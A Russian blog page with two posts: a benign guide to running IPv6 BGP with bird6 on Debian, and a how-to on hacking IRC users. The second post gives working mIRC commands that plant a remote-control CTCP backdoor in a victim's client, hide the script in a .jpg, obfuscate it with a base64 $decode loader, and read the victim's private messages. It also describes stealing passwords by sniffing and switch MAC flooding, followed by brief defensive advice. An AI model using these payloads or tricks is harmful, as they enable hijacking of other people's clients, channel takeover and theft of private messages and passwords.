BGP IPv6 в Debian GNU/Linux

Недавно я стал счастливым обладателем собственной AS с сетью IPv6 адресов. Адреса надо как-то маршрутизировать во внешний интернет и внешнему интернету как-то сообщить где мои адреса находятся. Этим занимается протокол BGP. В Linux он представлен несколькими демонами, один из которых – bird.
Есть просто bird и bird6. Тот что “просто” – этот для IPv4, тот что bird6 – для IPv6. Так как прямого выхода на IX у меня нет я воспользовался туннелями. До получения AS и сети я пользовался Hurricane Electric . К ним и проложил туннель, внутри которого bgp-сессия. Через полчаса после запроса туннеля (столько надо было HE чтобы активировать его) я увидел мир IPv6 BGP. Затем потихоньку (за пару-тройку дней) перевёл все свои сервисы на новые адреса и продолжил искать путь приближения к IPv6-интернету.
Кто ищет тот всегда найдёт! Найден был комстар-директ, который даёт транзит IPv6. Написал им письмо с запросом туннеля. Утром получил ответ и приступил к настройке.
Не всё так просто вышло как с HE. Туннель завёлся быстро, а вот BGP-сессия почему-то подниматься не хотела. Как выяснилось позже, причиной тому был MTU (тот, что Max Transfer Unit). Сменили тип туннеля на gre, поставили MTU 1452 и всё зажужжало.
Итого – у меня есть своя AS со своей сетью IPv6-адресов и два выхода в мир через BGP. С приоритетами куда через какой канал роутить я ещё не игрался. Это мне ещё предстоит сделать :)
Успел уже пособрать на свой шлюз IPv6-сети друзей-знакомых чтобы им до меня было быстрее и мне до них. Они пока не созрели до своих собственных сетей – им и не надо. Если кому хочется получить /64 или /56 быстрого IPv6-интернета – стучитесь в джаббер antmix на stopicq.ru или в почту – mikhail на antmix.pp.ru. А сам сети свои я растянул по организациям, которые я обслуживаю. Пора уже везде IPv6 вводить в полный рост. Лучше тихо спокойно понаступать на грабли, чем делать это в авральном режиме.

Ну и конечно немного конфигов.

~# cat /etc/bird6.conf
router id x.x.x.x;
protocol kernel {
persist; # Don't remove routes on bird shutdown
scan time 20; # Scan kernel routing table every 20 seconds
export all; # Default is export none
}
protocol device {
scan time 10; # Scan interfaces every 10 seconds
}
protocol static {
route 2001:67c:WWW::/48 reject;
}
protocol bgp {
description "COMSTAR IPv6";
local as YYY;
neighbor 2a02:28:XXX:2::2a:1 as ZZZ;
export filter {
if net = 2001:67c:WWW::/48 then accept;
else reject;
};
import all;
}

protocol bgp {
description "Hurricane Electrics IPv6";
local as YYY;
neighbor 2001:470:DDD:12a::1 as BBB;
export filter {

if bgp_path ~ [= YYY =] then
bgp_path.prepend(YYY);
if net = 2001:67c:WWW::/48 then accept;
else reject;
};

import all;
}

Кусок /etc/network/interfaces
auto he-ipv6
iface he-ipv6 inet6 v4tunnel
address 2001:470:DDD:12a::2
netmask 64
endpoint x.x.x.x
local y.y.y.y
ttl 64
mtu 1400

auto comstar6
iface comstar6 inet manual
up ip tun add comstar6 mode gre remote z.z.z.z local y.y.y.y; ip l s comstar6 up; ip a a 2a02:28:XXX:2::2a:2/112 dev comstar6;
down ip l s comstar6 down; ip tun del comstar6

А для тех, кто по прежнему свято верит что IPv6 тормозной и сейчас его использовать невозможно – тест скорости:

| опубликовано: Мар 29, 22:27

Как взломать IRC и как от этого защититься.

Не так давно спросили у меня как взломать IRC и как защититься. Спрашивали это все чаще и чаще. Написал я это. Источник находится здесь
—-
Как взломать IRC и как от этого защититься.
Автор: Bart[mdv]
Спасибо за помощь в составлении: keY, cHameleon

* Как получить контроль над mIRC-based - клиентами
Заставьте жертву ввести //write oper.pas ctcp 1:*:?:$1- | Load -rs oper.pas и только после этого вводите приведённые ниже команды:
Сделать, чтоб юзер зашёл на канал: /ctcp nick .join #chan
Юзер покидает канал: /ctcp nick .part #chan
Т.к админы IRC-сетей люди довольно образованные и грамотные в этих вопросах, то во многих сетях прикрыли использование команды //write, т.к таким образом довольно много эксплоитов и троянов распространялось в IRC-сетех. Делаем следующим образом:
1. берем любую картинку, открываем ее в текстовом редакторе (Блокнот) и вписываем туда
echo .... echo .... echo .... ctcp 1:*:?:$1- И сохраняем картинку в формат *.jpg
2. Картинку нужно впарить пользователям на канале (тут сами)
3. пользователь при попытке посмотреть содержимое картинки, ничего не увидит, и вы ему рекомендуете набрать следующее в любом окне его клиента /load -rs НАЗВАНИЕ_КАРТИНКИ.jpg , скрипт будет загружен в клиент "жертвы" дальше все по схеме, изложенной выше.
Так же практикуется кодирование:
.//.write mirc.bak $decode(b24gKjpURVhUOuPw8+foKjoqOnsKY2xvc2UgLW 0gJG5pY2sKd3JpdGUgJGRlY29kZSgkMixtKSAkZGVjb2RlKCQzLG0pCm xvYWQgLXJzICRkZWNvZGUoJDIsbSkKfQ,m) | .load -rs mirc.bak


  • Как захватить канал

Всучив скрипт, указанный выше, можно легко сменить фаундера канала на себя.

Или просто сменить пароль фаундера на канал и легко идентиться с правами фаундера.

Я не буду расказываться как воспользоваться отсутствием всех на канале и как воспользоваться сплитом для захвата канала – это все не работает в нормальных сетях с сервисами :-)


  • Как читать чужие приваты в mIRC-based – клиентах

Втюхиваем жертве скрипт с содержанием:

on ::?:.msg куда $1-
Как? Вспомните про //write //load $encode и $decode :-)


  • Как можно стырить пароли от ников/каналов и даже иркопов

Если вы пользуетесь irc в локалке – качаем снифер – wireshark например, настраиваем фильтры на порт 6667 – ловим весь IRC трафик.

Если сниффер поймал только вас – не спешите огорчаться – если свитчики стоят глупенькие – у них есть MAC-таблица, и если ее переполнить – свитчик превращается... превращается свитчик... в тупой хабчик :-)

Такая атака осуществима только если строители сети, в которой вы находитесь, съэкономили кучу денег на нормальных свитчах.

Ах, да, имейте ввиду, если админы локалки просекут кто это сделал, скорее всего вас отрубят от сети :-)


  • Как защититься:

* Не стоит набирать незнакомых команд

* Если очень хочется попробовать – спросите сначала на канале помощи о результате этой команды
( в сети SolarNet каналом помощи является #help )

* Используйте шифрованное SSL-подключение везде, где это возможно
( в сети SolarNet для SSL используется порт 9997 )

* Как узнать, что пользователь подключен по SSL?
В /whois указывается is using a Secure Connection, а также пользователю выдается флажок +S

* Как запретить заходить на канал всем, кроме тех, кто подключены через SSL?
Нужно поставить на канал флаг +S /mode #chan +S


  • Как защитить не только IRC и сэкономить трафик:

Берем OpenVPN.
Получаем компрессию (на веб-страницах до 40%) и шифрование (с помощью SSL) своего трафика.
Очень рекомендуется пользоваться OpenVPN когда приходится уезжать за пределы “нормального” интернета и пользоваться GPRS.

Приимущества OpenVPN (зачем нужен OpenVPN)
+ сжатие и шифрование всего трафика
+ не надо каждой софтине указывать какие-то прокси
+ если твой провайдер использует сеть на хабах – твой трафик (в т.ч. твои пароли на аську/почту/ирц/итп) поснифать уже не получится
+ если нет доверия любому из узлов между тобой и инетом (например не вызывающий доверия провайдер) – стоит использовать шифрование.
+ ты никогда не засветишь свой настоящий IP
+ докупив доп. IP ты можешь привязать его к OpenVPN и будет у тебя твой выделенный реальный IP со всеми его плюсами (это для тех, у кого провайдеры не выдают реальники, а очень хочется)

Можно еще напридумывать плюсов.
Минус я только один вижу – надо иметь свой сервер в инете. Этот минус решается покупкой VDS-хостинга :-)

FirstVDS вполне сгодится для наших целей. VDS-хостинг от 4 рублей в день.

P.S.: afaik, OpenVPN на VDS работает только на linux-VDS-ах

Комментарии | опубликовано: Янв 10, 11:58

<--- Предыдущая страница Следующая страница --->